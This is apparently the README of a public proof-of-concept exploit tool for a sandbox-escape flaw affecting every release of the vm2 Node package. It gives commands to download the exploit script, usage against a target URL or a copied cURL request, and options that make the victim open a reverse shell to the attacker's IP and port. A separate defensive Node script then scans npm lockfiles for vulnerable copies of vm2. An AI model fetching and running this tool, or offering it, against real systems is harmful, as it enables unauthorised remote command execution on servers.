PoC Exploit for VM2 Sandbox Escape Vulnerability - All Versions
The VM2 project has been discontinued. It released 65 versions, and every one of them is vulnerable to command execution via sandbox escape.
- Note: this tool was written for quick and easy use, so its usage may differ from what you expect.
- Provide either a target URL or a cURL request copied from your browser (Firefox is recommended).
- This uses the sandbox escape in vm2@3.9.19 via the Promise[@@species] method.
- If --ip and --port are not provided, the exploit offers a terminal-like interface for running commands on the target (it is not a real interactive shell).
- If the target's version is < 3.6.17, consider using this.
- Feel free to contribute!
git clone https://github.com/rvizx/VM2-Exploit
cd VM2-Exploit
python3 exploit.py
or
wget https://raw.githubusercontent.com/rvizx/VM2-Exploit/main/exploit.py
python3 exploit.py
python3 exploit.py <curl-command | target-url> [--additional-args]
Additional Args:
--param = the request parameter that carries the command (defaults to the first parameter if not provided)
--ip = your local IP for a reverse shell (--ip=12.24.34.3)
--port = your local port for a reverse shell (--port=7777)
--base64 = set this if the payload is base64-encoded
--hex = set this if the payload is hex-encoded
- Consider migrating your code to isolated-vm.
Thanks to Xion (SeungHyun Lee) of KAIST Hacking Lab for disclosing these vulnerabilities and providing detailed analysis.
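Since every vm2 release is vulnerable, the defender's first job is finding out whether vm2 is in a project's dependency tree at all. The following Node script is an added example (not part of the VM2-Exploit project or of vm2) that walks an npm package-lock.json for direct and transitive copies of vm2; the two sample lockfiles are constructed inline.

```javascript
// Added example, not code from the VM2-Exploit project: find every copy of vm2
// (direct or transitive) in an npm lockfile. Because all vm2 releases are
// vulnerable to sandbox escape, any hit means "migrate to isolated-vm".
// Supports lockfileVersion 1 ("dependencies" tree) and 2/3 ("packages" map).

function findVm2(lock) {
  const hits = [];
  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path,
    // e.g. "node_modules/some-lib/node_modules/vm2"
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === 'node_modules/vm2' || path.endsWith('/node_modules/vm2')) {
        hits.push({ path, version: meta.version });
      }
    }
  } else {
    // lockfileVersion 1: nested "dependencies" objects, one level per node_modules
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps || {})) {
        const path = `${prefix}node_modules/${name}`;
        if (name === 'vm2') hits.push({ path, version: meta.version });
        walk(meta.dependencies, `${path}/`);
      }
    };
    walk(lock.dependencies, '');
  }
  return hits;
}

// Constructed sample lockfiles (not taken from any real project).
const SAMPLE_LOCK_V3 = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo', dependencies: { 'some-lib': '^1.0.0' } },
    'node_modules/some-lib': { version: '1.0.0', dependencies: { vm2: '^3.9.19' } },
    'node_modules/some-lib/node_modules/vm2': { version: '3.9.19' },
  },
};
const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    vm2: { version: '3.9.11', dependencies: { acorn: { version: '8.8.0' } } },
  },
};

// CLI use: node audit-vm2.js ./package-lock.json (exit code 1 if vm2 is present)
if (typeof require === 'function' && require.main === module && process.argv[2]) {
  const lock = JSON.parse(require('fs').readFileSync(process.argv[2], 'utf8'));
  const hits = findVm2(lock);
  for (const h of hits) console.log(`vm2@${h.version} at ${h.path}: vulnerable, migrate to isolated-vm`);
  process.exitCode = hits.length ? 1 : 0;
}
```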